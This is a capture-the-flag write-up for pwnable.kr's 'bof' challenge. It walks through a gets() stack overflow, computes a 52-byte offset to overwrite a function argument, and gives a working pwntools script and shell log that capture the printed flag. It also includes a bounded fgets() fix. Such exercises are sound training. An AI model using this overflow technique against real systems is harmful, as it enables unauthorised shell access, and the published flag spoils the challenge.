## question

> Nana told me that buffer overflow is one of the most common software vulnerabilities. Is that true?
>
> Download : http://pwnable.kr/bin/bof
> Download : http://pwnable.kr/bin/bof.c
> Running at : nc pwnable.kr 9000
First look at the source file, then connect with nc and feed the program input.
## bof.c

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}

int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}
```
## analyse

Drag bof into IDA and take a look:

```c
unsigned int __cdecl func(int a1)
{
  char s; // [esp+1Ch] [ebp-2Ch]
  unsigned int v3; // [esp+3Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  puts("overflow me : ");
  gets(&s);
  if ( a1 == -889275714 )
    system("/bin/sh");
  else
    puts("Nah..");
  return __readgsdword(0x14u) ^ v3;
}
```
When main calls func, the argument key is pushed onto the stack above the return address, so the buffer can be overflowed all the way up to key and 0xcafebabe written into it (the decompiler shows the comparison as -889275714, which is 0xcafebabe interpreted as a signed 32-bit integer). IDA tells us that s lives at ebp-2Ch and key at ebp+8h, so 0x2c + 0x8 = 52 bytes of padding must be written before the 4-byte key value. The stack cookie at ebp-Ch (v3) is overwritten on the way, but it is only checked when func returns, after the key comparison has already run.
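The root cause is the unbounded `gets()` call. As an added example (not the challenge's code and not part of the original writeup), this is the bounded replacement a developer would ship: `fgets()` limited to the buffer size, with the overlong remainder of the line drained. `read_line_bounded`, `bounded_len_of` and `demo_overlong_input` are names chosen here; the 56-byte input is constructed to mirror the 52-byte padding plus 4-byte key value discussed above and is cut to 31 stored bytes, so nothing above the buffer is touched.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 32   /* same size as overflowme[32] in the challenge */

/* Hardened replacement for the gets() call in func(): fgets() stores at
 * most BUF_SIZE-1 bytes plus a NUL, so an over-long line is truncated
 * instead of running past the buffer into the cookie, saved frame pointer,
 * return address and the `key` argument.
 * Returns the number of bytes stored (newline removed), or -1 on EOF/error.
 * If the line did not fit, the remainder is discarded so it is not picked
 * up by a later read. */
int read_line_bounded(FILE *in, char *buf)
{
    if (fgets(buf, BUF_SIZE, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';          /* whole line fit: drop the newline */
    } else {
        int c;                      /* line was cut: drain the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)len;
}

/* Test helper (hypothetical, not part of the challenge): feeds a line
 * through read_line_bounded() via an in-memory FILE and returns the
 * number of bytes that were stored. */
int bounded_len_of(const char *line)
{
    char buf[BUF_SIZE];
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (in == NULL)
        return -1;
    int n = read_line_bounded(in, buf);
    fclose(in);
    return n;
}

/* Constructed input with the shape of the writeup's payload: 52 filler
 * bytes plus 4 more. Through the bounded reader only 31 bytes land in the
 * buffer, so key keeps its original value 0xdeadbeef. */
int demo_overlong_input(void)
{
    char line[64];
    memset(line, 'a', 56);
    line[56] = '\n';
    line[57] = '\0';
    return bounded_len_of(line);
}
```

A bounded read on its own does not add the missing authorization check, but it removes the memory-safety bug; compiling with a stack protector only detects the smash at return, which as noted above is too late here.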
## get flag

Python script as follows:

```python
from pwn import *

# Plain TCP connection to the challenge service (the original named it `ssh`).
io = remote("pwnable.kr", 9000)

# 52 bytes of padding (0x2c from s up to ebp, plus 8 to reach key at ebp+8),
# followed by the new key value as a little-endian dword. Bytes, not str,
# so the script also runs under Python 3.
payload = b"a" * 52 + p32(0xcafebabe)

io.sendline(payload)   # gets() reads up to the newline
io.interactive()
```
Run it:

```
ubuntu@VM-0-3-ubuntu:~$ python bof.py
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ ls
bof
bof.c
flag
log
log2
super.pl
$ cat flag
daddy, I just pwned a buFFer :)
$
[*] Closed connection to pwnable.kr port 9000
```
## flag

daddy, I just pwned a buFFer :)